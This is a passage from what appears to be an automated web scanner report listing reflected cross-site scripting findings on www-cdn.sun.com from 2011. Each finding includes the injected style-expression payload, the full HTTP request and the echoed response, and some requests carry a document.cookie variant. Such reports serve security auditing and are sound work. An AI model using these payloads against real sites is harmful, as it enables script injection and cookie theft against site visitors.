Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26B9CE72051487D4-60000151E01AC929[CE]

Response

HTTP/1.1 404 Not Found
Server: Sun-Java-System-Web-Server/7.0
P3p: policyref="http://www.sun.com/p3p/Sun_P3P_Policy.xml", CP="CAO DSP COR CUR ADMa DEVa TAIa PSAa PSDa CONi TELi OUR SAMi PUBi IND PHY ONL PUR COM NAV INT DEM CNT STA POL PRE GOV"
X-powered-by: JSP/2.1
Content-Type: text/html;charset=ISO-8859-1
Proxy-agent: Sun-Java-System-Web-Server/7.0
Cache-Control: public, max-age=31536000
Date: Sun, 06 Mar 2011 15:19:24 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 16042

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/1999/REC-html401-19991224/loose.dtd">
<html lang="en">
<head>
<meta http-equiv="content-type" content=
...[SNIP]...
<a href="/contact/feedback/index.jsp?requrl=/css/oo_style.csse233c"style="x:expression(alert(1))"25ced8cb3df&refurl=http://www-cdn.sun.com/sharebcdf0"style="x:expression(alert(1))"5046987b06c/metrics/metrics_group1.js&category=se">
...[SNIP]...

1.13. http://www-cdn.sun.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www-cdn.sun.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a649"style%3d"x%3aexpression(alert(1))"c80155b691 was submitted in the REST URL parameter 1. This input was echoed as 4a649"style="x:expression(alert(1))"c80155b691 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /favicon.ico4a649"style%3d"x%3aexpression(alert(1))"c80155b691 HTTP/1.1
Host: www-cdn.sun.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26B9CE72051487D4-60000151E01AC929[CE]; s_cc=true; s_nr=1299422689482; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Sun-Java-System-Web-Server/7.0
P3p: policyref="http://www.sun.com/p3p/Sun_P3P_Policy.xml", CP="CAO DSP COR CUR ADMa DEVa TAIa PSAa PSDa CONi TELi OUR SAMi PUBi IND PHY ONL PUR COM NAV INT DEM CNT STA POL PRE GOV"
X-powered-by: JSP/2.1
Content-Type: text/html;charset=ISO-8859-1
Proxy-agent: Sun-Java-System-Web-Server/7.0
Cache-Control: public, max-age=31536000
Date: Sun, 06 Mar 2011 14:45:42 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 15936

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/1999/REC-html401-19991224/loose.dtd">
<html lang="en">
<head>
<meta http-equiv="content-type" content=
...[SNIP]...
<a href="/contact/feedback/index.jsp?requrl=/favicon.ico4a649"style="x:expression(alert(1))"c80155b691&refurl=/UserTypedUrl&category=se">
...[SNIP]...

1.14. http://www-cdn.sun.com/js/app.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www-cdn.sun.com
Path:	/js/app.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 450ed"style%3d"x%3aexpression(alert(1))"4fe403eb08c was submitted in the REST URL parameter 1. This input was echoed as 450ed"style="x:expression(alert(1))"4fe403eb08c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /js450ed"style%3d"x%3aexpression(alert(1))"4fe403eb08c/app.js HTTP/1.1
Host: www-cdn.sun.com
Proxy-Connection: keep-alive
Referer: http://www-cdn.sun.com/sharebcdf0%22style%3d%22x%3aexpression(alert(1))%225046987b06c/metrics/metrics_group1.js
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26B9CE72051487D4-60000151E01AC929[CE]

Response

HTTP/1.1 404 Not Found
Server: Sun-Java-System-Web-Server/7.0
P3p: policyref="http://www.sun.com/p3p/Sun_P3P_Policy.xml", CP="CAO DSP COR CUR ADMa DEVa TAIa PSAa PSDa CONi TELi OUR SAMi PUBi IND PHY ONL PUR COM NAV INT DEM CNT STA POL PRE GOV"
X-powered-by: JSP/2.1
Content-Type: text/html;charset=ISO-8859-1
Proxy-agent: Sun-Java-System-Web-Server/7.0
Cache-Control: public, max-age=31536000
Date: Sun, 06 Mar 2011 15:15:24 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 16021

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/1999/REC-html401-19991224/loose.dtd">
<html lang="en">
<head>
<meta http-equiv="content-type" content=
...[SNIP]...
<a href="/contact/feedback/index.jsp?requrl=/js450ed"style="x:expression(alert(1))"4fe403eb08c/app.js&refurl=http://www-cdn.sun.com/sharebcdf0"style="x:expression(alert(1))"5046987b06c/metrics/metrics_group1.js&category=se">
...[SNIP]...

1.15. http://www-cdn.sun.com/js/app.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www-cdn.sun.com
Path:	/js/app.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49c2d"style%3d"x%3aexpression(alert(1))"7b4b26aff9 was submitted in the REST URL parameter 2. This input was echoed as 49c2d"style="x:expression(alert(1))"7b4b26aff9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /js/app.js49c2d"style%3d"x%3aexpression(alert(1))"7b4b26aff9 HTTP/1.1
Host: www-cdn.sun.com
Proxy-Connection: keep-alive
Referer: http://www-cdn.sun.com/sharebcdf0%22style%3d%22x%3aexpression(alert(1))%225046987b06c/metrics/metrics_group1.js
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26B9CE72051487D4-60000151E01AC929[CE]

Response

HTTP/1.1 404 Not Found
Server: Sun-Java-System-Web-Server/7.0
P3p: policyref="http://www.sun.com/p3p/Sun_P3P_Policy.xml", CP="CAO DSP COR CUR ADMa DEVa TAIa PSAa PSDa CONi TELi OUR SAMi PUBi IND PHY ONL PUR COM NAV INT DEM CNT STA POL PRE GOV"
X-powered-by: JSP/2.1
Content-Type: text/html;charset=ISO-8859-1
Proxy-agent: Sun-Java-System-Web-Server/7.0
Cache-Control: public, max-age=31536000
Date: Sun, 06 Mar 2011 15:18:56 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 16018

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/1999/REC-html401-19991224/loose.dtd">
<html lang="en">
<head>
<meta http-equiv="content-type" content=
...[SNIP]...
<a href="/contact/feedback/index.jsp?requrl=/js/app.js49c2d"style="x:expression(alert(1))"7b4b26aff9&refurl=http://www-cdn.sun.com/sharebcdf0"style="x:expression(alert(1))"5046987b06c/metrics/metrics_group1.js&category=se">
...[SNIP]...

1.16. http://www-cdn.sun.com/js/classes.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www-cdn.sun.com
Path:	/js/classes.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 837f3"style%3d"x%3aexpression(alert(1))"e6316f1d660 was submitted in the REST URL parameter 1. This input was echoed as 837f3"style="x:expression(alert(1))"e6316f1d660 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /js837f3"style%3d"x%3aexpression(alert(1))"e6316f1d660/classes.js HTTP/1.1
Host: www-cdn.sun.com
Proxy-Connection: keep-alive
Referer: http://www-cdn.sun.com/sharebcdf0%22style%3d%22x%3aexpression(alert(1))%225046987b06c/metrics/metrics_group1.js
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26B9CE72051487D4-60000151E01AC929[CE]

Response

HTTP/1.1 404 Not Found
Server: Sun-Java-System-Web-Server/7.0
P3p: policyref="http://www.sun.com/p3p/Sun_P3P_Policy.xml", CP="CAO DSP COR CUR ADMa DEVa TAIa PSAa PSDa CONi TELi OUR SAMi PUBi IND PHY ONL PUR COM NAV INT DEM CNT STA POL PRE GOV"
X-powered-by: JSP/2.1
Content-Type: text/html;charset=ISO-8859-1
Proxy-agent: Sun-Java-System-Web-Server/7.0
Cache-Control: public, max-age=31536000
Date: Sun, 06 Mar 2011 15:16:47 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 16033

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/1999/REC-html401-19991224/loose.dtd">
<html lang="en">
<head>
<meta http-equiv="content-type" content=
...[SNIP]...
<a href="/contact/feedback/index.jsp?requrl=/js837f3"style="x:expression(alert(1))"e6316f1d660/classes.js&refurl=http://www-cdn.sun.com/sharebcdf0"style="x:expression(alert(1))"5046987b06c/metrics/metrics_group1.js&category=se">
...[SNIP]...

1.17. http://www-cdn.sun.com/js/classes.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www-cdn.sun.com
Path:	/js/classes.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba427"style%3d"x%3aexpression(alert(1))"2523286bbb9 was submitted in the REST URL parameter 2. This input was echoed as ba427"style="x:expression(alert(1))"2523286bbb9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /js/classes.jsba427"style%3d"x%3aexpression(alert(1))"2523286bbb9 HTTP/1.1
Host: www-cdn.sun.com
Proxy-Connection: keep-alive
Referer: http://www-cdn.sun.com/sharebcdf0%22style%3d%22x%3aexpression(alert(1))%225046987b06c/metrics/metrics_group1.js
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26B9CE72051487D4-60000151E01AC929[CE]

Response

HTTP/1.1 404 Not Found
Server: Sun-Java-System-Web-Server/7.0
P3p: policyref="http://www.sun.com/p3p/Sun_P3P_Policy.xml", CP="CAO DSP COR CUR ADMa DEVa TAIa PSAa PSDa CONi TELi OUR SAMi PUBi IND PHY ONL PUR COM NAV INT DEM CNT STA POL PRE GOV"
X-powered-by: JSP/2.1
Content-Type: text/html;charset=ISO-8859-1
Proxy-agent: Sun-Java-System-Web-Server/7.0
Cache-Control: public, max-age=31536000
Date: Sun, 06 Mar 2011 15:17:35 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 16033

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/1999/REC-html401-19991224/loose.dtd">
<html lang="en">
<head>
<meta http-equiv="content-type" content=
...[SNIP]...
<a href="/contact/feedback/index.jsp?requrl=/js/classes.jsba427"style="x:expression(alert(1))"2523286bbb9&refurl=http://www-cdn.sun.com/sharebcdf0"style="x:expression(alert(1))"5046987b06c/metrics/metrics_group1.js&category=se">
...[SNIP]...

1.18. http://www-cdn.sun.com/js/content.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www-cdn.sun.com
Path:	/js/content.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8873"style%3d"x%3aexpression(alert(1))"beaadd2cc9d was submitted in the REST URL parameter 1. This input was echoed as d8873"style="x:expression(alert(1))"beaadd2cc9d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /jsd8873"style%3d"x%3aexpression(alert(1))"beaadd2cc9d/content.js HTTP/1.1
Host: www-cdn.sun.com
Proxy-Connection: keep-alive
Referer: http://www-cdn.sun.com/sharebcdf0%22style%3d%22x%3aexpression(alert(1))%225046987b06c/metrics/metrics_group1.js
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26B9CE72051487D4-60000151E01AC929[CE]

Response

HTTP/1.1 404 Not Found
Server: Sun-Java-System-Web-Server/7.0
P3p: policyref="http://www.sun.com/p3p/Sun_P3P_Policy.xml", CP="CAO DSP COR CUR ADMa DEVa TAIa PSAa PSDa CONi TELi OUR SAMi PUBi IND PHY ONL PUR COM NAV INT DEM CNT STA POL PRE GOV"
X-powered-by: JSP/2.1
Content-Type: text/html;charset=ISO-8859-1
Proxy-agent: Sun-Java-System-Web-Server/7.0
Cache-Control: public, max-age=31536000
Date: Sun, 06 Mar 2011 15:15:59 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 16033

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/1999/REC-html401-19991224/loose.dtd">
<html lang="en">
<head>
<meta http-equiv="content-type" content=
...[SNIP]...
<a href="/contact/feedback/index.jsp?requrl=/jsd8873"style="x:expression(alert(1))"beaadd2cc9d/content.js&refurl=http://www-cdn.sun.com/sharebcdf0"style="x:expression(alert(1))"5046987b06c/metrics/metrics_group1.js&category=se">
...[SNIP]...

1.19. http://www-cdn.sun.com/js/content.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www-cdn.sun.com
Path:	/js/content.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 216eb"style%3d"x%3aexpression(alert(1))"54f76338cfa was submitted in the REST URL parameter 2. This input was echoed as 216eb"style="x:expression(alert(1))"54f76338cfa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /js/content.js216eb"style%3d"x%3aexpression(alert(1))"54f76338cfa HTTP/1.1
Host: www-cdn.sun.com
Proxy-Connection: keep-alive
Referer: http://www-cdn.sun.com/sharebcdf0%22style%3d%22x%3aexpression(alert(1))%225046987b06c/metrics/metrics_group1.js
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26B9CE72051487D4-60000151E01AC929[CE]

Response

HTTP/1.1 404 Not Found
Server: Sun-Java-System-Web-Server/7.0
P3p: policyref="http://www.sun.com/p3p/Sun_P3P_Policy.xml", CP="CAO DSP COR CUR ADMa DEVa TAIa PSAa PSDa CONi TELi OUR SAMi PUBi IND PHY ONL PUR COM NAV INT DEM CNT STA POL PRE GOV"
X-powered-by: JSP/2.1
Content-Type: text/html;charset=ISO-8859-1
Proxy-agent: Sun-Java-System-Web-Server/7.0
Cache-Control: public, max-age=31536000
Date: Sun, 06 Mar 2011 15:17:22 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 16033

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/1999/REC-html401-19991224/loose.dtd">
<html lang="en">
<head>
<meta http-equiv="content-type" content=
...[SNIP]...
<a href="/contact/feedback/index.jsp?requrl=/js/content.js216eb"style="x:expression(alert(1))"54f76338cfa&refurl=http://www-cdn.sun.com/sharebcdf0"style="x:expression(alert(1))"5046987b06c/metrics/metrics_group1.js&category=se">
...[SNIP]...

1.20. http://www-cdn.sun.com/js/hp.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www-cdn.sun.com
Path:	/js/hp.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62871"style%3d"x%3aexpression(alert(1))"d70bb00c0ad was submitted in the REST URL parameter 1. This input was echoed as 62871"style="x:expression(alert(1))"d70bb00c0ad in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /js62871"style%3d"x%3aexpression(alert(1))"d70bb00c0ad/hp.js HTTP/1.1
Accept: */*
Referer: http://www-cdn.sun.com/share/metrics/metrics_group1.js6b935%22style%3d%22x%3aexpression(alert(document.cookie))%22a60bd884a65
Accept-Language: en-US
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Host: www-cdn.sun.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Sun-Java-System-Web-Server/7.0
P3p: policyref="http://www.sun.com/p3p/Sun_P3P_Policy.xml", CP="CAO DSP COR CUR ADMa DEVa TAIa PSAa PSDa CONi TELi OUR SAMi PUBi IND PHY ONL PUR COM NAV INT DEM CNT STA POL PRE GOV"
X-powered-by: JSP/2.1
Content-Type: text/html;charset=ISO-8859-1
Proxy-agent: Sun-Java-System-Web-Server/7.0
Cache-Control: public, max-age=31535999
Date: Sun, 06 Mar 2011 15:17:32 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 16032

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/1999/REC-html401-19991224/loose.dtd">
<html lang="en">
<head>
<meta http-equiv="content-type" content=
...[SNIP]...
<a href="/contact/feedback/index.jsp?requrl=/js62871"style="x:expression(alert(1))"d70bb00c0ad/hp.js&refurl=http://www-cdn.sun.com/share/metrics/metrics_group1.js6b935"style="x:expression(alert(document.cookie))"a60bd884a65&category=se">
...[SNIP]...

1.21. http://www-cdn.sun.com/js/hp.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www-cdn.sun.com
Path:	/js/hp.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed5a1"style%3d"x%3aexpression(alert(1))"e52f5d6c672 was submitted in the REST URL parameter 2. This input was echoed as ed5a1"style="x:expression(alert(1))"e52f5d6c672 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /js/hp.jsed5a1"style%3d"x%3aexpression(alert(1))"e52f5d6c672 HTTP/1.1
Accept: */*
Referer: http://www-cdn.sun.com/share/metrics/metrics_group1.js6b935%22style%3d%22x%3aexpression(alert(document.cookie))%22a60bd884a65
Accept-Language: en-US
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Host: www-cdn.sun.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Sun-Java-System-Web-Server/7.0
P3p: policyref="http://www.sun.com/p3p/Sun_P3P_Policy.xml", CP="CAO DSP COR CUR ADMa DEVa TAIa PSAa PSDa CONi TELi OUR SAMi PUBi IND PHY ONL PUR COM NAV INT DEM CNT STA POL PRE GOV"
X-powered-by: JSP/2.1
Content-Type: text/html;charset=ISO-8859-1
Proxy-agent: Sun-Java-System-Web-Server/7.0
Cache-Control: public, max-age=31536000
Date: Sun, 06 Mar 2011 15:18:38 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 16032

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/1999/REC-html401-19991224/loose.dtd">
<html lang="en">
<head>
<meta http-equiv="content-type" content=
...[SNIP]...
<a href="/contact/feedback/index.jsp?requrl=/js/hp.jsed5a1"style="x:expression(alert(1))"e52f5d6c672&refurl=http://www-cdn.sun.com/share/metrics/metrics_group1.js6b935"style="x:expression(alert(document.cookie))"a60bd884a65&category=se">
...[SNIP]...

1.22. http://www-cdn.sun.com/js/libs.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www-cdn.sun.com
Path:	/js/libs.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ce24"style%3d"x%3aexpression(alert(1))"1e5f3ddb067 was submitted in the REST URL parameter 1. This input was echoed as 7ce24"style="x:expression(alert(1))"1e5f3ddb067 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /js7ce24"style%3d"x%3aexpression(alert(1))"1e5f3ddb067/libs.js HTTP/1.1
Host: www-cdn.sun.com
Proxy-Connection: keep-alive
Referer: http://www-cdn.sun.com/sharebcdf0%22style%3d%22x%3aexpression(alert(1))%225046987b06c/metrics/metrics_group1.js
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26B9CE72051487D4-60000151E01AC929[CE]

Response

HTTP/1.1 404 Not Found
Server: Sun-Java-System-Web-Server/7.0
P3p: policyref="http://www.sun.com/p3p/Sun_P3P_Policy.xml", CP="CAO DSP COR CUR ADMa DEVa TAIa PSAa PSDa CONi TELi OUR SAMi PUBi IND PHY ONL PUR COM NAV INT DEM CNT STA POL PRE GOV"
X-powered-by: JSP/2.1
Content-Type: text/html;charset=ISO-8859-1
Proxy-agent: Sun-Java-System-Web-Server/7.0
Cache-Control: public, max-age=31536000
Date: Sun, 06 Mar 2011 15:16:21 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 16024

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/1999/REC-html401-19991224/loose.dtd">
<html lang="en">
<head>
<meta http-equiv="content-type" content=
...[SNIP]...
<a href="/contact/feedback/index.jsp?requrl=/js7ce24"style="x:expression(alert(1))"1e5f3ddb067/libs.js&refurl=http://www-cdn.sun.com/sharebcdf0"style="x:expression(alert(1))"5046987b06c/metrics/metrics_group1.js&category=se">
...[SNIP]...

1.23. http://www-cdn.sun.com/js/libs.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www-cdn.sun.com
Path:	/js/libs.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 316f7"style%3d"x%3aexpression(alert(1))"9e4e1a08567 was submitted in the REST URL parameter 2. This input was echoed as 316f7"style="x:expression(alert(1))"9e4e1a08567 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /js/libs.js316f7"style%3d"x%3aexpression(alert(1))"9e4e1a08567 HTTP/1.1
Host: www-cdn.sun.com
Proxy-Connection: keep-alive
Referer: http://www-cdn.sun.com/sharebcdf0%22style%3d%22x%3aexpression(alert(1))%225046987b06c/metrics/metrics_group1.js
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26B9CE72051487D4-60000151E01AC929[CE]

Response

HTTP/1.1 404 Not Found
Server: Sun-Java-System-Web-Server/7.0
P3p: policyref="http://www.sun.com/p3p/Sun_P3P_Policy.xml", CP="CAO DSP COR CUR ADMa DEVa TAIa PSAa PSDa CONi TELi OUR SAMi PUBi IND PHY ONL PUR COM NAV INT DEM CNT STA POL PRE GOV"
X-powered-by: JSP/2.1
Content-Type: text/html;charset=ISO-8859-1
Proxy-agent: Sun-Java-System-Web-Server/7.0
Cache-Control: public, max-age=31536000
Date: Sun, 06 Mar 2011 15:17:52 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 16024

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/1999/REC-html401-19991224/loose.dtd">
<html lang="en">
<head>
<meta http-equiv="content-type" content=
...[SNIP]...
<a href="/contact/feedback/index.jsp?requrl=/js/libs.js316f7"style="x:expression(alert(1))"9e4e1a08567&refurl=http://www-cdn.sun.com/sharebcdf0"style="x:expression(alert(1))"5046987b06c/metrics/metrics_group1.js&category=se">
...[SNIP]...

1.24. http://www-cdn.sun.com/js/s_code_remote.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www-cdn.sun.com
Path:	/js/s_code_remote.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 442f4"style%3d"x%3aexpression(alert(1))"1733b1bfede was submitted in the REST URL parameter 1. This input was echoed as 442f4"style="x:expression(alert(1))"1733b1bfede in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /js442f4"style%3d"x%3aexpression(alert(1))"1733b1bfede/s_code_remote.js HTTP/1.1
Host: www-cdn.sun.com
Proxy-Connection: keep-alive
Referer: http://www-cdn.sun.com/sharebcdf0%22style%3d%22x%3aexpression(alert(1))%225046987b06c/metrics/metrics_group1.js
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26B9CE72051487D4-60000151E01AC929[CE]

Response

HTTP/1.1 404 Not Found
Server: Sun-Java-System-Web-Server/7.0
